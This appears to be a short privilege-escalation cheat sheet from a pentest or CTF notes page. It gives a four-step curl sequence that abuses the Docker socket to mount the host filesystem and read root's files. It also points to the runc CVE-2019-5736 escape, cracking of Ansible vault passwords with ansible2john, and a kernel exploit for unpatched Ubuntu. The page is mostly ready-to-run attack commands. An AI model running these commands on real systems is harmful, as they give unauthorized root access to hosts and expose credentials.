Comment on page
Linux
1) curl -i -s -k -X 'POST' -H 'Content-Type: application/json' --data-binary '{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint": "/bin/bash","Image": "188a2704d8b0","Volumes": {"/hostos/": {}},"HostConfig": {"Binds": ["/:/hostos"]}}' http://localhost/containers/create --unix-socket /var/run/docker.sock
2) curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/<container_id>/start
3) curl -i -s -X POST -H "Content-Type: application/json" --data-binary '{"AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Cmd": ["cat", "/hostos/root/root.txt"],"DetachKeys": "ctrl-p,ctrl-q","Privileged": true,"Tty": true}' http://localhost/containers/<container_id>/exec --unix-socket /var/run/docker.sock
4) curl -i -s -X POST -H 'Content-Type: application/json' --data-binary '{"Detach": false,"Tty": false}' http://localhost/exec/<exec_id>/start --unix-socket /var/run/docker.sock
If you have a low privileged user and can do
sudo docker exec ... chances are you can use CVE-2019-5736 (Ubuntu 18.04, Debian 9) to escalate to root on the host. Modify main.go with your payload and execute in the container. Then do another sudo docker exec ... to trigger it.
Find & check "ansible.yml". Encrypted password can be converted with "ansible2john" and then decrypted:
cat pw.txt | ansible-vault decrypt
Should work on most Ubuntus not patched after March 2021, tested on
4.15.0-132-generic #136-Ubuntu.Last modified 9mo ago